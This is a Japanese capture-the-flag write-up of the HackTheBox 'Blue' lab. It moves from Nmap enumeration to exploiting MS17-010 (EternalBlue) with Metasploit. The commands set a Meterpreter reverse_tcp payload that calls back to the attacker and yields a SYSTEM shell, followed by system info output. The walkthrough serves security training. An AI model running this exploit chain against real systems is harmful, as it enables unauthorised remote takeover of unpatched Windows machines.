Table of Contents
Enumeration: Portscan by Nmap
Nmapでターゲット「10.10.10.40」に対してポートスキャンを実施。
※Nmapについて詳しく知りたい方は、以下のリンクをご参照ください。
Nmap
Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing.
Network Scanning using NMAP (Beginner Guide)
Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw I…
nmap -sC -sV -oA blue 10.10.10.40
-sC: default script scan
-sV: service version detection against open ports
-oA: Output in the three major formats at onceroot@kali:~/Desktop/htb/lab/blue# nmap -sC -sV -oA blue 10.10.10.40 Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-22 03:41 EDT Nmap scan report for 10.10.10.40 Host is up (0.24s latency). Not shown: 991 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -17m04s, deviation: 34m35s, median: 2m53s | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: haris-PC | NetBIOS computer name: HARIS-PC\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2020-04-22T08:45:33+01:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-04-22 03:45:31 |_ start_date: 2020-04-21 10:49:30
スキャン結果から、445/tcpでSMBが動作していることを確認。
Enumeration: 445/tcp (SMB)
NmapのデフォルトのスクリプトスキャンにはEnternal Blue等のSMB脆弱性スキャンが含まれていないため、再度Nmapで445/portに対してスクリプトスキャンを図る。まずは、loacate と xargs と grep のコマンドの組み合わせでSMB関連のnseスクリプトの一覧をcategoryと共に表示する。
locate -r '\.nse$' | xargs grep categories | grep -i smb
-r: Regular Expression
root@kali:~/Desktop/htb/lab/devel# locate -r '\.nse$' | xargs grep categories | grep -i smb
/usr/share/nmap/scripts/smb-brute.nse:categories = {"intrusive", "brute"}
/usr/share/nmap/scripts/smb-double-pulsar-backdoor.nse:categories = {"vuln", "safe", "malware"}
/usr/share/nmap/scripts/smb-enum-domains.nse:categories = {"discovery","intrusive"}
/usr/share/nmap/scripts/smb-enum-groups.nse:categories = {"discovery","intrusive"}
/usr/share/nmap/scripts/smb-enum-processes.nse:categories = {"discovery", "intrusive"}
/usr/share/nmap/scripts/smb-enum-services.nse:categories = {"discovery","intrusive","safe"}
/usr/share/nmap/scripts/smb-enum-sessions.nse:categories = {"discovery","intrusive"}
/usr/share/nmap/scripts/smb-enum-shares.nse:categories = {"discovery","intrusive"}
/usr/share/nmap/scripts/smb-enum-users.nse:categories = {"auth","intrusive"}
/usr/share/nmap/scripts/smb-flood.nse:categories = {"intrusive","dos"}
/usr/share/nmap/scripts/smb-ls.nse:categories = {"discovery", "safe"}
/usr/share/nmap/scripts/smb-mbenum.nse:categories = {"discovery", "safe"}
/usr/share/nmap/scripts/smb-os-discovery.nse:categories = {"default", "discovery", "safe"}
/usr/share/nmap/scripts/smb-print-text.nse:categories = {"intrusive"}
/usr/share/nmap/scripts/smb-protocols.nse:categories = {"safe", "discovery"}
/usr/share/nmap/scripts/smb-psexec.nse:categories = {"intrusive"}
/usr/share/nmap/scripts/smb-security-mode.nse:categories = {"default", "discovery", "safe"}
/usr/share/nmap/scripts/smb-server-stats.nse:categories = {"discovery","intrusive"}
/usr/share/nmap/scripts/smb-system-info.nse:categories = {"discovery","intrusive"}
/usr/share/nmap/scripts/smb-vuln-conficker.nse:categories = {"intrusive","exploit","dos","vuln"}
/usr/share/nmap/scripts/smb-vuln-cve-2017-7494.nse:categories = {"vuln","intrusive"}
/usr/share/nmap/scripts/smb-vuln-cve2009-3103.nse:categories = {"intrusive","exploit","dos","vuln"}
/usr/share/nmap/scripts/smb-vuln-ms06-025.nse:categories = {"intrusive","exploit","dos","vuln"}
/usr/share/nmap/scripts/smb-vuln-ms07-029.nse:categories = {"intrusive","exploit","dos","vuln"}
/usr/share/nmap/scripts/smb-vuln-ms08-067.nse:categories = {"intrusive","exploit","dos","vuln"}
/usr/share/nmap/scripts/smb-vuln-ms10-054.nse:categories = {"vuln","intrusive","dos"}
/usr/share/nmap/scripts/smb-vuln-ms10-061.nse:categories = {"vuln","intrusive"}
/usr/share/nmap/scripts/smb-vuln-ms17-010.nse:categories = {"vuln", "safe"}
/usr/share/nmap/scripts/smb-vuln-regsvc-dos.nse:categories = {"intrusive","exploit","dos","vuln"}
/usr/share/nmap/scripts/smb2-capabilities.nse:categories = {"safe", "discovery"}
/usr/share/nmap/scripts/smb2-security-mode.nse:categories = {"safe", "discovery", "default"}
/usr/share/nmap/scripts/smb2-time.nse:categories = {"discovery", "safe", "default"}
/usr/share/nmap/scripts/smb2-vuln-uptime.nse:categories = {"vuln", "safe"}
今回はMS17-010「Eternal Blue」のスクリプトが含まれているcategory「vuln」と「safe」の両方に属するスクリプト群を指定して、Nmapのスクリプトスキャンを実施。
nmap -p 445 --script "vuln and safe" -Pn -n 10.10.10.40
--script <category>: script scan in specific category
-Pn:Treat all hosts as online -- skip host discovery
-n: Do not resolve hostnames via DNSroot@kali:~/Desktop/htb/lab/blue# nmap -p 445 --script "vuln and safe" -Pn -n 10.10.10.40 Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-22 04:20 EDT Nmap scan report for 10.10.10.40 Host is up (0.31s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
ターゲットにMS17-010「Eternal Blue」の脆弱性が存在することを確認。
Exploitation: 445/tcp (SMB)
SearchSploitでMS17-010のExploitを検索。
※SearchSploitについて詳しく知りたい方は、以下を参照してください。
Comprehensive Guide on SearchSploit
Hello friends!! Several times you might have read our articles on CTF challenges and other, where we have used searchsploit to find out an exploit if available in its Database. Today in this article we are going to discuss searchsploit in detail. Table of Content Introduction to searchsploit Title S…
searchsploit MS17-010
root@kali:~/Desktop/htb/lab/blue# searchsploit MS17-010
------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) | exploits/windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | exploits/windows/dos/41891.rb
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) | exploits/windows/remote/41987.py
Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows_x86-64/remote/42031.py
Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows/remote/42315.py
Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows_x86-64/remote/42030.py
------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
6個のExploitがヒット。今回はMetasploitのExploit「Microsoft Windows – SMB Remote Code Execution Scanner (MS17-010) (Metasploit)」を利用する。当該ExploitのURLやFull Pathを確認するため、「-p」を付与してSearchSploitを再実行。
searchsploit -p 41891
root@kali:~/Desktop/htb/lab/blue# searchsploit -p 41891
Exploit: Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)
URL: https://www.exploit-db.com/exploits/41891/
Path: /usr/share/exploitdb/exploits/windows/dos/41891.rb
File Type: Ruby script, ASCII text, with CRLF line terminators
上記のURLにアクセスすると、Exploit DBの以下のサイトが表示される。
Microsoft Windows – SMB Remote Code Execution Scanner (MS17-010) (Metasploit)
Microsoft Windows – SMB Remote Code Execution Scanner (MS17-010) (Metasploit). CVE-2017-0147CVE-2017-0146CVE-2017-0148CVE-2017-0145CVE-2017-0144CVE-2017-0143CVE-MS17-010 . dos exploit for Windows platform
msfdb runでMetasploitを起動し、searchでms17-010のExploitを検索。
msfdb run
msf > search ms17-010msf > search ms17-010 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/admin/smb/ms17_010_command 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ exploit/windows/smb/ms17_010_psexec 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
上記の結果で表示されたMSFのExploit Module「exploit/windows/smb/ms17_010_eternalblue」を利用。
msf > use exploit/windows/smb/ms17_010_eternalblue msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp msf exploit(windows/smb/ms17_010_eternalblue) > set lhost tun0 msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.40 msf exploit(windows/smb/ms17_010_eternalblue) > exploit
システム権限「NT AUTHORITY\SYSTEM」で動作するシェル奪取に成功。
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
sysinfo/systeminfoより、以下のシステム情報を確認。
– OS: Microsoft Windows 7 Professional
– OS Version: 6.1.7601 Service Pack 1 Build 7601
– Architecutre: x64
– Hotfix: 200個適用
– Original Install Date: 14/07/2017, 14:45:30
meterpreter > sysinfo
Computer : HARIS-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x64/windows
meterpreter > shell
Process 1680 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>systeminfo
systeminfo
Host Name: HARIS-PC
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: haris
Registered Organization:
Product ID: 00371-223-0841251-86078
Original Install Date: 14/07/2017, 14:45:30
System Boot Time: 21/04/2020, 15:49:12
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-gb;English (United Kingdom)
Input Locale: en-us;English (United States)
Time Zone: (UTC) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,433 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,450 MB
Virtual Memory: In Use: 645 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 200 Hotfix(s) Installed.
[01]: KB2849697
[02]: KB2849696
[03]: KB2841134
---------抜粋-----------
[199]: KB976902
[200]: KB982018
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.40
[02]: fe80::7c51:acf2:ed03:8b2
[03]: dead:beef::dc1c:2bf:be01:5072
[04]: dead:beef::7c51:acf2:ed03:8b2
Links
- HackTheBox – Blue by IppSec
https://www.youtube.com/watch?v=YRsfX6DW10E&t=1212s